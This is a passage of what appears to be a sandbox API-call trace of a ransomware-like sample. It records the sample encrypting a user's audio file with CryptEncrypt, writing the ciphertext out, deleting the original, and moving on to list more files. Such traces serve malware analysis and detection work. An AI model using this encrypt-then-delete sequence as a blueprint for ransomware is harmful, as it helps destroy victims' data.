lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0117.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.452] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.455] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.457] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x11773, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x11780) returned 1 [0117.457] CharLowerBuffW (in: lpsz="byte[71553]", cchLength=0xb | out: lpsz="byte[71553]") returned 0xb [0117.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.459] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e088*=0x11773, dwBufLen=0x11780 | out: pbData=0x499a008*, pdwDataLen=0x144e088*=0x11780) returned 1 [0117.459] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.461] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x11780, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x11780, lpOverlapped=0x0) returned 1 [0117.463] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.463] CryptDestroyKey (hKey=0x41ac000) returned 1 [0117.463] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.463] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.464] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.464] CryptReleaseContext (hProv=0x41a49d0, dwFlags=0x0) returned 1 [0117.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.464] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.464] CloseHandle (hObject=0x258) returned 1 [0117.464] CloseHandle (hObject=0x298) returned 1 [0117.466] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a", lpFilePart=0x0) returned 0x4a [0117.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0117.466] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\ymtk.m4a")) returned 0x20 [0117.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7668 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0117.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b87d480, ftCreationTime.dwHighDateTime=0x1d5e0cf, ftLastAccessTime.dwLowDateTime=0xf027b580, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xf027b580, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ymTK.m4a", cAlternateFileName="")) returned 0x41ac600 [0117.467] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\ymtk.m4a")) returned 1 [0117.476] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b87d480, ftCreationTime.dwHighDateTime=0x1d5e0cf, ftLastAccessTime.dwLowDateTime=0xf027b580, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xf027b580, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ymTK.m4a", cAlternateFileName="")) returned 0 [0117.476] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8430 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.477] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0117.477] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0117.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.478] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0117.478] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0117.478] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0117.478] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0117.479] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0117.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.481] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.481] 